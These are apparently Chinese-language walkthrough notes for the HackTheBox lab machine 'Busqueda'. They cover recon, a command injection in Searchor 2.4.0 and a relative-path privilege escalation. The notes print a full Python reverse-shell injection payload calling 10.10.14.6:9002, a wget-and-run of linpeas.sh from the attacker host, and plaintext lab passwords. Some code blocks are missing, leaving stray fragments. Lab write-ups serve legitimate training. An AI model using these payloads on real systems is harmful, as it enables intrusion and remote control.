Busqueda(Docker信息搜集)
10.10.11.208
1 |
|
echo “10.10.11.208 searcher.htb” >> /etc/hosts
gobuster dir -u http://searcher.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k
flask是什么
flask是一个基于python的web框架
searchor 2.4.0
https://security.snyk.io/package/pip/searchor/2.4.0
https://github.com/jonnyzar/POC-Searchor-2.4.2/blob/main/README.md
存在任意命令执行
‘, exec(“import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘10.10.14.6’,9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/sh’,’-i’]);”))#
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
准备提权
cd /home/kali/Desktop/htb/10.10.11.208
cp /pentest/priv/PEASS-ng/linPEAS/linpeas.sh .
python3 -m http.server 80
【getshell运行】cd /tmp;wget http://10.10.14.6/linpeas.sh;chmod +x linpeas.sh;./linpeas.sh > out.txt
信息搜集:/var/www/app/app.py
cat /etc/hosts
echo 10.10.11.208 gitea.searcher.htb >> /etc/hosts
发现一个新的网站
find / -name “config” 2>/dev/null
1 |
|
尝试使用密码登陆,发现此密码jh1usoih2bkjaspwe92
是svc用户的正确密码
1 |
|
信息搜集,发现提权脚本
使用找到的口令登陆:http://gitea.searcher.htb/user/login
administrator
yuiu1hoiu4i5ho1uh
查看administrator此用户的脚本,可以用full-checkup.sh来提权
原理是该用户可以用root权限运行system-checkup.py,而该脚本可以运行full-checkup.sh
因此使用相对路径提权的手法,伪造full-checkup.sh进行反弹shell
1 |
|
cd /tmp
1 |
|